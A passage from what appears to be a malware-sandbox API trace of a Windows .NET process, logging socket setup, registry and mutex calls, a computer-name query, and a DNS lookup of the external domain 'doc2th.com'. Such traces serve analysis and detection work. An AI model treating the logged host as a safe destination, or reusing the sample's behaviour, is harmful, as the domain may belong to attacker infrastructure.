RasEnumConnectionsW (in: param_1=0x399978, param_2=0x51ceb90, param_3=0x51ceb94 | out: param_1=0x399978, param_2=0x51ceb90, param_3=0x51ceb94) returned 0x0 [0054.904] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x399978 | out: lpWSAData=0x399978) returned 0 [0054.910] GetLastError () returned 0x0 [0054.912] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0054.916] GetLastError () returned 0x0 [0054.916] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0054.916] GetLastError () returned 0x273a [0054.916] 
closesocket (s=0x40c) returned 0 [0054.916] GetLastError () returned 0x0 [0054.916] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0054.917] GetLastError () returned 0x0 [0054.917] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0054.917] GetLastError () returned 0x273a [0054.917] closesocket (s=0x40c) returned 0 [0054.917] GetLastError () returned 0x0 [0054.920] GetCurrentProcess () returned 0xffffffff [0054.920] GetLastError () returned 0x3f0 [0054.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce6fc | out: TokenHandle=0x51ce6fc*=0x40c) returned 1 [0054.920] GetLastError () returned 0x3f0 [0054.923] GetCurrentProcess () returned 0xffffffff [0054.923] GetLastError () returned 0x3f0 [0054.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce70c | out: TokenHandle=0x51ce70c*=0x410) returned 1 [0054.923] GetLastError () returned 0x3f0 [0054.933] GetCurrentProcessId () returned 0xb44 [0054.935] GetComputerNameW (in: lpBuffer=0x399978, nSize=0x252a560 | out: lpBuffer="F71GWAT", nSize=0x252a560) returned 1 [0054.935] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ce960 | out: phkResult=0x51ce960*=0x414) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x1, lpData=0x0, lpcbData=0x51ce9a4*=0x1c) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x399978, lpcbData=0x51ce9a4*=0x1c | out: lpType=0x51ce9a8*=0x1, lpData="netfxperf.dll", lpcbData=0x51ce9a4*=0x1c) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x51ce9a8, 
lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x4, lpData=0x0, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x51ce994, lpcbData=0x51ce9a4*=0x4 | out: lpType=0x51ce9a8*=0x4, lpData=0x51ce994*=0x1, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x4, lpData=0x0, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x51ce994, lpcbData=0x51ce9a4*=0x4 | out: lpType=0x51ce9a8*=0x4, lpData=0x51ce994*=0x1040, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegCloseKey (hKey=0x414) returned 0x0 [0054.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ce95c | out: phkResult=0x51ce95c*=0x414) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x4, lpData=0x0, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x51ce990, lpcbData=0x51ce9a0*=0x4 | out: lpType=0x51ce9a4*=0x4, lpData=0x51ce990*=0x3, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x4, lpData=0x0, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x51ce990, lpcbData=0x51ce9a0*=0x4 | out: lpType=0x51ce9a4*=0x4, 
lpData=0x51ce990*=0x20000, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.937] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x3, lpData=0x0, lpcbData=0x51ce9a0*=0xaa) returned 0x0 [0054.937] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x252cc90, lpcbData=0x51ce9a0*=0xaa | out: lpType=0x51ce9a4*=0x3, lpData=0x252cc90*, lpcbData=0x51ce9a0*=0xaa) returned 0x0 [0054.938] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0054.939] GetLastError () returned 0x0 [0054.941] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x393528, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418 [0054.941] GetLastError () returned 0x0 [0054.942] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4770000 [0054.944] VirtualQuery (in: lpAddress=0x4770000, lpBuffer=0x51ce974, dwLength=0x1c | out: lpBuffer=0x51ce974*(BaseAddress=0x4770000, AllocationBase=0x4770000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0054.944] GetLastError () returned 0x0 [0054.944] LocalFree (hMem=0x38dda0) returned 0x0 [0054.945] RegCloseKey (hKey=0x414) returned 0x0 [0054.946] GetVersionExW (in: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.946] GetLastError () returned 0x0 [0054.946] GetVersionExW (in: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, 
dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.946] GetLastError () returned 0x0 [0054.947] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252d6f8, cbSid=0x51ce954 | out: pSid=0x252d6f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.947] GetLastError () returned 0x0 [0054.948] CreateMutexW (lpMutexAttributes=0x252d830, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.948] GetLastError () returned 0x0 [0054.949] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.949] GetLastError () returned 0x0 [0054.949] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252da04, cbSid=0x51ce914 | out: pSid=0x252da04*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce914) returned 1 [0054.949] GetLastError () returned 0x0 [0054.949] CreateMutexW (lpMutexAttributes=0x252db14, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0054.949] GetLastError () returned 0x5 [0054.950] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x41c [0054.950] GetLastError () returned 0x5 [0054.950] WaitForSingleObject (hHandle=0x41c, dwMilliseconds=0x1f4) returned 0x0 [0054.950] GetLastError () returned 0x5 [0054.950] ReleaseMutex (hMutex=0x41c) returned 1 [0054.950] GetLastError () returned 0x5 [0054.950] CloseHandle (hObject=0x41c) returned 1 [0054.950] GetLastError () returned 0x5 [0054.950] GetCurrentProcessId () returned 0xb44 [0054.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 
dwProcessId=0xb44) returned 0x41c [0054.951] GetLastError () returned 0x5 [0054.952] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x51ce918, lpExitTime=0x51ce910, lpKernelTime=0x51ce910, lpUserTime=0x51ce910 | out: lpCreationTime=0x51ce918, lpExitTime=0x51ce910, lpKernelTime=0x51ce910, lpUserTime=0x51ce910) returned 1 [0054.952] GetLastError () returned 0x5 [0054.954] CloseHandle (hObject=0x41c) returned 1 [0054.954] GetLastError () returned 0x5 [0054.955] ReleaseMutex (hMutex=0x414) returned 1 [0054.955] GetLastError () returned 0x5 [0054.955] CloseHandle (hObject=0x414) returned 1 [0054.955] GetLastError () returned 0x5 [0054.955] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252e3f8, cbSid=0x51ce954 | out: pSid=0x252e3f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.955] GetLastError () returned 0x5 [0054.956] CreateMutexW (lpMutexAttributes=0x252e508, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.956] GetLastError () returned 0x0 [0054.956] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.956] GetLastError () returned 0x0 [0054.956] ReleaseMutex (hMutex=0x414) returned 1 [0054.956] GetLastError () returned 0x0 [0054.956] CloseHandle (hObject=0x414) returned 1 [0054.956] GetLastError () returned 0x0 [0054.956] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252ec7c, cbSid=0x51ce954 | out: pSid=0x252ec7c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.956] GetLastError () returned 0x0 [0054.957] CreateMutexW (lpMutexAttributes=0x252ed8c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.957] GetLastError () returned 0x0 [0054.957] WaitForSingleObject (hHandle=0x414, 
dwMilliseconds=0x1f4) returned 0x0 [0054.957] GetLastError () returned 0x0 [0054.957] ReleaseMutex (hMutex=0x414) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CloseHandle (hObject=0x414) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252f504, cbSid=0x51ce954 | out: pSid=0x252f504*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CreateMutexW (lpMutexAttributes=0x252f614, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.957] GetLastError () returned 0x0 [0054.957] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.957] GetLastError () returned 0x0 [0054.958] ReleaseMutex (hMutex=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CloseHandle (hObject=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252fd84, cbSid=0x51ce954 | out: pSid=0x252fd84*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateMutexW (lpMutexAttributes=0x252fe94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.958] GetLastError () returned 0x0 [0054.958] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.958] GetLastError () returned 0x0 [0054.958] ReleaseMutex (hMutex=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CloseHandle (hObject=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2530600, cbSid=0x51ce94c | out: pSid=0x2530600*(Revision=0x1, 
SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CreateMutexW (lpMutexAttributes=0x2530710, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.959] GetLastError () returned 0x0 [0054.959] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.959] GetLastError () returned 0x0 [0054.959] ReleaseMutex (hMutex=0x414) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CloseHandle (hObject=0x414) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2530e88, cbSid=0x51ce94c | out: pSid=0x2530e88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.959] GetLastError () returned 0x0 [0054.960] CreateMutexW (lpMutexAttributes=0x2530f98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.960] GetLastError () returned 0x0 [0054.960] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.960] GetLastError () returned 0x0 [0054.960] ReleaseMutex (hMutex=0x414) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CloseHandle (hObject=0x414) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25316ec, cbSid=0x51ce94c | out: pSid=0x25316ec*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CreateMutexW (lpMutexAttributes=0x25317fc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.960] GetLastError () returned 0x0 [0054.960] WaitForSingleObject 
(hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.960] GetLastError () returned 0x0 [0054.961] ReleaseMutex (hMutex=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CloseHandle (hObject=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2531f60, cbSid=0x51ce94c | out: pSid=0x2531f60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateMutexW (lpMutexAttributes=0x2532070, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.961] GetLastError () returned 0x0 [0054.961] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.961] GetLastError () returned 0x0 [0054.961] ReleaseMutex (hMutex=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CloseHandle (hObject=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25327cc, cbSid=0x51ce94c | out: pSid=0x25327cc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.962] GetLastError () returned 0x0 [0054.962] CreateMutexW (lpMutexAttributes=0x25328dc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.962] GetLastError () returned 0x0 [0054.962] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.962] GetLastError () returned 0x0 [0054.962] ReleaseMutex (hMutex=0x414) returned 1 [0054.962] GetLastError () returned 0x0 [0054.962] CloseHandle (hObject=0x414) returned 1 [0054.962] GetLastError () returned 0x0 [0054.964] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414 [0054.964] GetLastError 
() returned 0x0 [0054.965] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0054.965] GetLastError () returned 0x0 [0054.966] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x51ceb98 | out: argp=0x51ceb98) returned 0 [0054.966] GetLastError () returned 0x0 [0054.967] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420 [0054.967] GetLastError () returned 0x0 [0054.967] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424 [0054.967] GetLastError () returned 0x0 [0054.967] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x51ceb98 | out: argp=0x51ceb98) returned 0 [0054.967] GetLastError () returned 0x0 [0054.968] WSAIoctl (in: s=0x414, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0) returned -1 [0054.968] GetLastError () returned 0x2733 [0054.968] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0054.980] GetLastError () returned 0x2733 [0054.981] WSAEventSelect (s=0x414, hEventObject=0x41c, lNetworkEvents=512) returned 0 [0054.981] GetLastError () returned 0x0 [0054.981] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0) returned -1 [0054.981] GetLastError () returned 0x2733 [0054.981] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking 
socket operation could not be completed immediately.\r\n") returned 0x45 [0054.981] GetLastError () returned 0x2733 [0054.989] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0 [0054.989] GetLastError () returned 0x0 [0054.989] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428 [0054.989] GetLastError () returned 0x0 [0054.990] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x428, param_3=0x3) returned 0x0 [0054.994] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x51ceb60 | out: phkResult=0x51ceb60*=0x440) returned 0x0 [0054.994] GetLastError () returned 0x0 [0054.997] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x444) returned 0x0 [0054.997] GetLastError () returned 0x0 [0054.997] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448 [0054.997] GetLastError () returned 0x0 [0054.998] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0 [0054.998] GetLastError () returned 0x0 [0054.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x44c) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450 [0054.999] GetLastError () returned 0x0 [0054.999] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x454) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458 [0054.999] GetLastError () returned 0x0 [0054.999] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0 [0054.999] GetLastError () returned 0x0 [0055.000] GetCurrentProcess () returned 0xffffffff [0055.000] GetLastError () returned 0x3f0 [0055.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ceb04 | out: TokenHandle=0x51ceb04*=0x45c) returned 1 [0055.000] GetLastError () returned 0x3f0 [0055.003] GetCurrentProcess () returned 0xffffffff [0055.003] GetLastError () returned 0x3f0 [0055.003] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce720 | out: TokenHandle=0x51ce720*=0x460) returned 1 [0055.003] GetLastError () returned 0x3f0 [0055.005] GetCurrentProcess () returned 0xffffffff [0055.005] GetLastError () returned 0x3f0 [0055.005] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce730 | out: TokenHandle=0x51ce730*=0x464) returned 1 [0055.005] GetLastError () returned 0x3f0 [0055.025] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x3934f8 | out: pProxyConfig=0x3934f8) returned 1 [0055.053] GetLastError () returned 0x0 [0055.065] GetCurrentProcess () returned 0xffffffff [0055.065] GetLastError () returned 0x3f0 [0055.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce758 | out: TokenHandle=0x51ce758*=0x4b4) returned 1 [0055.065] GetLastError () returned 0x3f0 [0055.065] GetCurrentProcess () returned 0xffffffff [0055.065] GetLastError () returned 0x3f0 [0055.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce768 | out: TokenHandle=0x51ce768*=0x4b8) 
returned 1 [0055.065] GetLastError () returned 0x3f0 [0055.066] SetEvent (hEvent=0x3a8) returned 1 [0055.066] GetLastError () returned 0x3f0 [0055.076] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x51ceab8 | out: pFixedInfo=0x0, pOutBufLen=0x51ceab8) returned 0x6f [0055.089] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x51d2828 [0055.089] GetLastError () returned 0x0 [0055.089] GetNetworkParams (in: pFixedInfo=0x51d2828, pOutBufLen=0x51ceab8 | out: pFixedInfo=0x51d2828, pOutBufLen=0x51ceab8) returned 0x0 [0055.098] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0055.098] GetLastError () returned 0x0 [0055.103] LocalFree (hMem=0x51d2828) returned 0x0 [0055.103] GetLastError () returned 0x0 [0055.106] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc [0055.106] GetLastError () returned 0x0 [0055.107] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8 [0055.107] GetLastError () returned 0x0 [0055.110] getaddrinfo (in: pNodeName="doc2th.com", pServiceName=0x0, pHints=0x51ce994*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x51ce728 | out: ppResult=0x51ce728*=0x3bc4b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="doc2th.com", ai_addr=0x3bbd70*(sa_family=2, sin_port=0x0, sin_addr="192.232.251.15"), ai_next=0x0)) returned 0 [0055.116] GetLastError () returned 0x0 [0055.117] FreeAddrInfoW (pAddrInfo=0x3bc4b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="doc2th.com", ai_addr=0x3bbd70*(sa_family=2, sin_port=0x0, sin_addr="192.232.251.15"), ai_next=0x0)) [0055.117] GetLastError () returned 0x0 [0055.118] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0055.118] GetLastError () returned 0x0 [0055.118] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) 
returned 0x4d4 [0055.118] GetLastError () returned 0x0 [0055.118] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x51ce978 | out: argp=0x51ce978) returned 0 [0055.118] GetLastError () returned 0x0 [0055.118] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4 [0055.118] GetLastError () returned 0x0 [0055.119] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8 [0055.119] GetLastError () returned 0x0 [0055.119] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x51ce978 | out: argp=0x51ce978) returned 0 [0055.119] GetLastError () returned 0x0 [0055.119] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0) returned -1 [0055.119] GetLastError () returned 0x2733 [0055.119] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0055.119] GetLastError () returned 0x2733 [0055.119] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0 [0055.119] GetLastError () returned 0x0 [0055.119] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0) returned -1 